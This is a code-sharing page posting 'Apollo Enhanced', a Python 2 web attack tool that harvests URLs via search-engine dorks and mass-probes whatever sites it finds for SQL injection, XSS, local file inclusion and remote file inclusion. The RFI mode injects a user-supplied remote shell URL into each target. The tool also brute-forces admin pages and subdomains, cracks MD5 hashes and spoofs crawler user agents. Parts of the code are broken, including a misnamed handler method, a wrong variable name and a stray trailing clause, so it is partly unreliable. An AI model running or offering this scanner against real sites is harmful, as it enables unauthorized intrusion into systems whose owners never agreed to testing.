Revision: 64323
Initial Code
Initial URL
Initial Description
Initial Title
Initial Tags
Initial Language
at July 24, 2013 05:51 by madfedora
Initial Code
#!/usr/bin/env python
"""
Apollo.py - Python Vulnerability Scanner V1 -
Written by Sotd - twitter.com/#!/Sotd_
Modified and fixed by madfedora
[email protected]
"""
import re
import hashlib
import Queue
from random import choice
import threading
import time
import urllib2
import sys
import socket
USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
"YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6",
"Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1 rv:2.0; sl-SI) AppleWebKit/533.24.1 (KHTML, like Gecko) Version/4.0.3 Safari/533.24.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/531.13.6 (KHTML, like Gecko) Version/5.0.2 Safari/531.13.6",
"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.1)"
]
option = ' '
vuln = 0
invuln = 0
np = 0
found = []
class Crawl:
"""Searches for dorks and grabs results"""
def __init__(self):
if option == '4':
self.shell = str(raw_input('Shell Location: '))
self.dork = raw_input('Enter your dork: ')
self.queue = Queue.Queue()
self.pages = raw_input('How many pages (Max 80): ')
self.qdork = urllib2.quote(self.dork)
self.page = 1
self.crawler()
def crawler(self):
"""Crawler"""
print '\nDorking...'
for i in range(int(self.pages)):
host = "http://us.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page)
req = urllib2.Request(host)
req.add_header('User-Agent', choice(USER_AGENT))
response = urllib2.urlopen(req)
source = response.read()
start = 0
count = 1
end = len(source)
numlinks = source.count('_t" href', start, end)
while count < numlinks:
start = source.find('_t" href', start, end)
end = source.find(' onmousedown="return pk', start, end)
link = source[start+10:end-1].replace("amp;","")
self.queue.put(link)
start = end
end = len(source)
count = count + 1
self.page += 1
if option == '1':
for i in range(10):
thread = ScanClass(self.queue)
thread.setDaemon(True)
thread.start()
self.queue.join()
elif option == '3':
for i in range(10):
thread = LScanClass(self.queue)
thread.setDaemon(True)
thread.start()
self.queue.join()
elif option == '2':
for i in range(10):
thread = XScanClass(self.queue)
thread.setDaemon(True)
thread.start()
self.queue.join()
elif option == '4':
for i in range(10):
thread = RScanClass(self.queue, self.shell)
thread.setDaemon(True)
thread.start()
self.queue.join()
class ScanClass(threading.Thread):
"""Scans for Sql errors and ouputs to file"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
self.schar = "'"
self.file = 'sqli-result.txt'
def run(self):
"""Scans Url for Sql errors"""
while True:
try:
site = self.queue.get(False)
except Queue.Empty:
break
if '=' in site:
global vuln
global invuln
global np
test = site + self.schar
try:
conn = urllib2.Request(test)
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
data = opener.open(conn).read()
except:
self.queue.task_done()
else:
#===========================================================#
# #
# MySQL #
# #
#===========================================================#
if (re.findall("You have an error in your SQL syntax", data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('Error:unknown', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('mysql_fetch', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('mysql_numrows', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('mysql_num', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('Invalid Query', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('FetchRow', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('GetArray', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('SELECT statements have a different number of columns', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('\' doesn\'t exist', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('Unexpected EOF found when reading file', data, re.I)):
self.mysql(test)
vuln += 1
elif (re.findall('Triggers can not be created on system tables', data, re.I)):
self.mysql(test)
vuln += 1
#===========================================================#
# #
# MsSQL #
# #
#===========================================================#
elif (re.findall('OLE DB Provider for SQL Server', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('Unclosed quotation mark before the character string', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('All queries in a SQL statement containing a UNION', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('Syntax error converting the varchar value', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('syntax near the keyword \'', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('String or binary data would be truncated', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('Invalid object name \'', data, re.I)):
self.mssql(test)
vuln += 1
elif (re.findall('Incorrect syntax near', data, re.I)):
self.mssql(test)
vuln += 1
#===========================================================#
# #
# Oracle #
# #
#===========================================================#
elif (re.findall('oracle.jdbc.', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('java.sql.sqlexception', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('SQL command not properly ended', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('quoted string not properly terminated', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('wrong number or types of arguments in call to', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('query block has incorrect number of result columns', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('expression must have same datatype as correspoding expression', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('ORA-01722:', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('a non-numeric character was found where a numeric was expected', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('FROM keyword not found where expected', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('ORA-00936:', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('ORA-00972:', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('table or view does not exist', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('Invalid relational operator', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('missing right parenthesis', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('ORA-00900:', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('ORA-03001:', data, re.I)):
self.oracle(test)
vuln += 1
elif (re.findall('can only select from fixed tables/views', data, re.I)):
self.oracle(test)
vuln += 1
#===========================================================#
# #
# OLE DB #
# #
#===========================================================#
elif (re.findall('system.data.oledb', data, re.I)):
self.ole(test)
vuln += 1
elif (re.findall('Microsoft OLE DB Provider for', data, re.I)):
self.ole(test)
vuln += 1
#===========================================================#
# #
# ODBC #
# #
#===========================================================#
elif (re.findall('ODBC Microsoft Access Driver', data, re.I)):
self.odbc(test)
vuln += 1
elif (re.findall('ODBC Microsoft Server Driver', data, re.I)):
self.odbc(test)
vuln += 1
#===========================================================#
# #
# JET DB #
# #
#===========================================================#
elif (re.findall('JET Database Engine', data, re.I)):
self.jet(test)
vuln += 1
#===========================================================#
# #
# ADO DB #
# #
#===========================================================#
elif (re.findall('ADODB.Field', data, re.I)):
self.ado(test)
vuln += 1
elif (re.findall('ADODB.Command', data, re.I)):
self.ado(test)
vuln += 1
elif (re.findall('BOF or EOF', data, re.I)):
self.ado(test)
vuln += 1
#===========================================================#
# #
# PostgreSQL #
# #
#===========================================================#
elif (re.findall('postgresql.util', data, re.I)):
self.pgsql(test)
vuln += 1
elif (re.findall('ERROR: invalid input syntax for integer', data, re.I)):
self.pgsql(test)
vuln += 1
elif (re.findall('null_value_eliminated_in_set_function', data, re.I)):
self.pgsql(test)
vuln += 1
elif (re.findall('dynamic_result_sets_returned', data, re.I)):
self.pgsql(test)
vuln += 1
elif (re.findall(': FATAL', data, re.I)):
self.pgsql(test)
vuln += 1
elif (re.findall(': could not connect to server', data, re.I)):
self.pgsql(test)
vuln += 1
#===========================================================#
# #
# Sybase #
# #
#===========================================================#
elif (re.findall('Warning: sybase_query()', data, re.I)):
self.sybase(test)
vuln += 1
elif (re.findall('sybase_fetch_assoc()', data, re.I)):
self.sybase(test)
vuln += 1
#===========================================================#
# #
# Misc #
# #
#===========================================================#
elif (re.findall('query failed:', data, re.I)):
self.misc(test)
vuln += 1
else:
print B+test+W+' <-- Not Vuln'
invuln += 1
else:
print R+site+W+' <-- No Parameters'
np += 1
self.queue.task_done()
def mysql(self, url):
"""Outputs"""
read = open(self.file, "a+").read()
if url in read:
print G+'[DUPE] '+W+url
else:
print O+"[MySQL] " + url+W
write = open(self.file, "a+")
write.write('[MySQL] ' + url + "\n")
write.close()
def mssql(self, url):
"""Outputs"""
read = open(self.file, "a+").read()
if url in read:
print G+'[DUPE] ' + url+W
else:
print O+"[MsSQL] " + url+W
write = open (self.file, "a+")
write.write('[MsSQL] ' + url + "\n")
write.close()
def oracle(self, url):
"""Outputs"""
read = open(self.file, "a+").read()
if url in read:
print G+'[DUPE] ' + url+W
else:
print O+"[Oracle] " + url+W
write = open (self.file, "a+")
write.write('[Oracle] ' + url + "\n")
write.close()
def ole(self, url):
"""Outputs"""
read = open(self.file, "a+").read()
if url in read:
print G+'[DUPE] ' + url+W
else:
print O+"[OLE DB] " + url+W
write = open (self.file, "a+")
write.write('[OLE DB] ' + url + "\n")
write.close()
def odbc(self, url):
"""Outputs"""
read = open(self.file, "a+").read()
if url in read:
print G+'[DUPE] ' + url+W
else:
print O+"[ODBC] " + url+W
write = open (self.file, "a+")
write.write('[ODBC] ' + url + "\n")
write.close()
def jet(self, url):
"""Outputs"""
read = open(self.file, "a+").read()
if url in read:
print G+'[DUPE] ' + url+W
else:
print O+"[JET DB] " + url+W
write = open (self.file, "a+")
write.write('[JET DB] ' + url + "\n")
write.close()
def ado(self, url):
"""Outputs"""
read = open(self.file, "a+").read()
if url in read:
print G+'[DUPE] ' + url+W
else:
print O+"[ADO] " + url+W
write = open (self.file, "a+")
write.write('[ADO] ' + url + "\n")
write.close()
def psql(self, url):
"""Outputs"""
read = open(self.file, "a+").read()
if url in read:
print G+'[DUPE] ' + url+W
else:
print O+"[PGSQL] " + url+W
write = open (self.file, "a+")
write.write('[PGSQL] ' + url + "\n")
write.close()
def sybase(self, url):
"""Outputs"""
read = open(self.file, "a+").read()
if url in read:
print G+'[DUPE] ' + url+W
else:
print O+"[SYBASE] " + url+W
write = open (self.file, "a+")
write.write('[SYBASE] ' + url + "\n")
write.close()
def misc(self, url):
"""Outputs"""
read = open(self.file, "a+").read()
if url in read:
print G+'[DUPE] ' + url+W
else:
print O+"[Misc] " + url+W
write = open (self.file, "a+")
write.write('[Misc] ' + url + "\n")
write.close()
class LScanClass(threading.Thread):
"""Scans for Lfi errors and outputs to file"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.file = 'lfi-result.txt'
self.queue = queue
self.lchar = '../'
def run(self):
"""Checks Url for File Inclusion errors"""
while True:
try:
site = self.queue.get(False)
except Queue.Empty:
break
if '=' in site:
lsite = site.rsplit('=', 1)[0]
if lsite[-1] != "=":
lsite = lsite + "="
test = lsite + self.lchar
global vuln
global invuln
global np
try:
conn = urllib2.Request(test)
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
data = opener.open(conn).read()
except:
self.queue.task_done()
else:
if (re.findall("failed to open stream: No such file or directory", data, re.I)):
self.lfi(test)
vuln += 1
else:
print B+test+W+' <-- Not Vuln'
invuln += 1
else:
print R+site+W+' <-- No Parameters'
np += 1
self.queue.task_done()
def lfi(self, url):
"""Outputs"""
read = open(self.file, "a+").read()
if url in read:
print G+'[DUPE] ' + url+W
else:
print O+"[LFI] " + url+W
write = open(self.file, "a+")
write.write('[LFI] ' + url + "\n")
write.close()
class XScanClass(threading.Thread):
"""Scan for Xss errors and outputs to file"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
self.xchar = """%3CScRIpT%3Ealert(%224p0ll0%22)%3C%2FScRiPt%3E"""
self.file = 'xss-result.txt'
def run(self):
"""Checks Url for possible Xss"""
while True:
try:
site = self.queue.get(False)
except Queue.Empty:
break
if '=' in site:
global vuln
global invuln
global np
xsite = site.rsplit('=', 1)[0]
if xsite[-1] != "=":
xsite = xsite + "="
test = xsite + self.xchar
try:
conn = urllib2.Request(test)
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
data = opener.open(conn).read()
except:
self.queue.task_done()
else:
if (re.findall("4p0ll0", data, re.I)):
self.xss(test)
vuln += 1
else:
print B+test+W+' <-- Not Vuln'
invuln += 1
else:
print R+site+W+' <-- No Parameters'
np += 1
self.queue.task_done()
def xss(self, url):
"""Outputs"""
read = open(self.file, "a+").read()
if url in read:
print G+'[DUPE] ' + url+W
else:
print O+"[XSS] " + url+W
write = open(self.file, "a+")
write.write('[XSS] ' + url + "\n")
write.close()
class RScanClass(threading.Thread):
"""Scans for Rfi errors and outputs to file"""
def __init__(self, queue, shell):
threading.Thread.__init__(self)
self.queue = queue
self.file = 'rfi-result.txt'
self.shell = shell
def run(self):
"""Checks Url for Remote File Inclusion vulnerability"""
while True:
try:
site = self.queue.get(False)
except Queue.Empty:
break
if '=' in site:
global vuln
global invuln
global np
rsite = site.rsplit('=', 1)[0]
if rsite[-1] != "=":
rsite = rsite + "="
link = rsite + self.shell + '?'
try:
conn = urllib2.Request(link)
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
data = opener.open(conn).read()
except:
self.queue.task_done()
else:
if (re.findall('uname -a', data, re.I)):
self.rfi(link)
vuln += 1
else:
print B+link+W+' <-- Not Vuln'
invuln += 1
else:
print R+site+W+' <-- No Parameters'
np += 1
self.queue.task_done()
def rfi(self, url):
"""Outputs"""
read = open(self.file, "a+").read()
if url in read:
print G+'[DUPE] ' + url+W
else:
print O+"[RFI] " + url+W
write = open(self.file, "a+")
write.write('[RFI] ' + url + "\n")
write.close()
class Atest(threading.Thread):
"""Checks given site for Admin Pages"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
"""Checks if Admin Page exists"""
while True:
try:
site = self.queue.get(False)
except Queue.Empty:
break
try:
conn = urllib2.Request(site)
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
opener.open(conn)
print site
found.append(site)
self.queue.task_done()
except urllib2.URLError:
self.queue.task_done()
def admin():
"""Create queue and threads for admin page scans"""
print 'Need to include http:// and ending /\n'
site = raw_input('Site: ')
queue = Queue.Queue()
dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/',
'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php',
'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html',
'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php',
'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp',
'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html',
'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php',
'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html',
'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html',
'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html',
'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html',
'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html',
'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html',
'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html',
'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html',
'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php',
'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php',
'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php',
'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php','admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
for add in dirs:
test = site + add
queue.put(test)
for i in range(20):
thread = Atest(queue)
thread.setDaemon(True)
thread.start()
queue.join()
def aprint():
"""Print results of admin page scans"""
print 'Search Finished\n'
if len(found) == 0:
print '-[!]- No pages found'
else:
for site in found:
print O+'-[!]- Found: ' + G+site+W
class SDtest(threading.Thread):
"""Checks given Domain for Sub Domains"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
"""Checks if Sub Domain responds"""
while True:
try:
domain = self.queue.get(False)
except Queue.Empty:
break
try:
site = domain
conn = urllib2.Request(site)
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
opener.open(conn)
except urllib2.URLError:
self.queue.task_done()
else:
target = socket.gethostbyname(domain)
print 'Found: ' + site + ' - ' + target
self.queue.task_done()
def subd():
"""Create queue and threads for sub domain scans"""
queue = Queue.Queue()
site = raw_input('Domain: ')
sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca",
"billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro",
"connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana",
"directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange",
"eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford",
"groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d",
"imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil",
"mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere",
"pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research",
"restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping",
"smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads",
"ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1",
"ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"]
for check in sub:
test = check + '.' + site
queue.put(test)
for i in range(20):
thread = SDtest(queue)
thread.setDaemon(True)
thread.start()
queue.join()
class Cracker(threading.Thread):
"""Use a wordlist to try and brute the hash"""
def __init__(self, queue, hashm):
threading.Thread.__init__(self)
self.queue = queue
self.hashm = hashm
def run(self):
"""Hash word and check against hash"""
while True:
try:
word = self.queue.get(False)
except Queue.Empty:
break
tmp = hashlib.md5(word).hexdigest()
if tmp == self.hashm:
self.result(word)
self.queue.task_done()
def result(self, words):
"""Print result if found"""
print self.hashm + ' = '+Words
def word():
"""Create queue and threads for hash crack"""
queue = Queue.Queue()
wordlist = raw_input('Wordlist: ')
hashm = raw_input('Enter MD5 hash: ')
read = open(wordlist)
for words in read:
words = words.replace("\n","")
queue.put(words)
read.close()
for i in range(5):
thread = Cracker(queue, hashm)
thread.setDaemon(True)
thread.start()
queue.join()
class OnlineCrack:
"""Use online service to check for hash"""
def crack(self):
"""Connect and check hash"""
hashm = raw_input('Enter MD5 Hash: ')
conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm))
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
opener.open(conn)
data = opener.open(conn).read()
if data == 'No results returned.':
print '\n-[!]- Not found!'
if data == 'Cleartext of':
print '\n-[!]- %s' % (data)
class Check:
"""IP address Checker"""
def grab(self):
"""Connect to site and grab IP"""
site = 'http://www.tracemyip.org/'
try:
conn = urllib2.Request(site)
conn.add_header('User-Agent', choice(USER_AGENT))
opener = urllib2.build_opener()
opener.open(conn)
data = opener.open(conn).read()
start = 0
end = len(data)
start = data.find('onClick="', start, end)
end = data.find('size=', start, end)
ip_add = data[start+46:end-2].strip()
print B+'\n-[!]- Your IP Address Is '+R+'%s' % (ip_add) +W
except urllib2.HTTPError:
print '-[!]- Error connecting'
def output():
"""Outputs dork scan results to screen"""
print '\n>> ' + str(vuln) + G+' Vulnerable Sites Found'+W
print '>> ' + str(invuln) + G+' Sites Not Vulnerable'+W
print '>> ' + str(np) + R+' Sites Without Parameters'+W
if option == '1':
print '>> Output Saved To sqli-result.txt\n'
elif option == '2':
print '>> Output Saved To lfi-result.txt'
elif option == '3':
print '>> Output Saved To xss-result.txt'
elif option == '4':
print '>> Output Saved To rfi-result.txt'
W = "\033[0m";
R = "\033[31m";
G = "\033[32m";
O = "\033[33m";
B = "\033[34m";
def main():
"""Outputs Menu and gets input"""
print (O+'''
Apollo [Enhanced]
by madhatter
Original by Sotd
github.com/SotdCode/Apollo''')
print (G+'''
-[1]- SQL Injection
-[2]- Cross Site Scripting
-[3]- Local File Incursion
-[4]- Remote File Incursion
-[5]- Admin Page Finder
-[6]- Sub Domain Finder
-[7]- Dictionary MD5 cracker
-[8]- Online MD5 cracker
-[9]- IP Address Checker
-[10]- See What Changed''')
print W
global option
option = raw_input('-[!]- Enter Option: ')
if option:
if option == '1':
Crawl()
output()
elif option == '2':
Crawl()
output()
elif option == '3':
Crawl()
output()
elif option == '4':
Crawl()
output()
elif option == '5':
admin()
aprint()
elif option == '6':
subd()
elif option == '7':
word()
elif option == '8':
OnlineCrack().crack()
elif option == '9':
Check().grab()
elif option == '10':
print(O+'''\n--- Changes Made in Enhanced Apollo ---''')
print(G+'''
= Apollo now scan wider range of SQL DBs
---- MySQL [More errors]
---- MsSQL [More errors]
---- Oracle/JBDC
---- ODBC
---- OLEDB
---- JETDB
---- ADODB
---- ProgreSQL
---- Sybase
= XSS added evasion
= Removed paramiko, due to errors
= Added Color UI
= Added more admin pages''')
print(O+'''\n--- Future Plans ---''')
print(G+'''
= Random User Agent [WIP]
= TOR/Polipo [WIP]
= SSH tunnelling (better than paramiko)
= Online Proxy Grabber [WIP]
= More detail on IP [WIP]
= SQL Column Counter [WIP]
= Persistent XSS finder
= XSS finder with manual options
= SQLi with manual options''')
print(B+'''\n## Contact at [email protected] ##''')
print W
else:
print R+'\nInvalid Choice\n'+W
time.sleep(0.5)
main()
else:
print R+'\nYou Must Enter An Option\n'+W
time.sleep(0.5)
main()
if __name__ == '__main__':
main()
elif conf.get("threads", 0) > 1:
os._exit(0)
Initial URL
https://github.com/SotdCode
Initial Description
This is a fork of the original project “Apollo†Python Vulnerability Scanner by Sotd. This fork version has majorly enhanced SQL and XSS dorking functions. Please do not rip either mine or Sotd codes, because if you do, KITTENS WILL DIE! Ahem…
Initial Title
Apollo Enhanced
Initial Tags
Initial Language
Python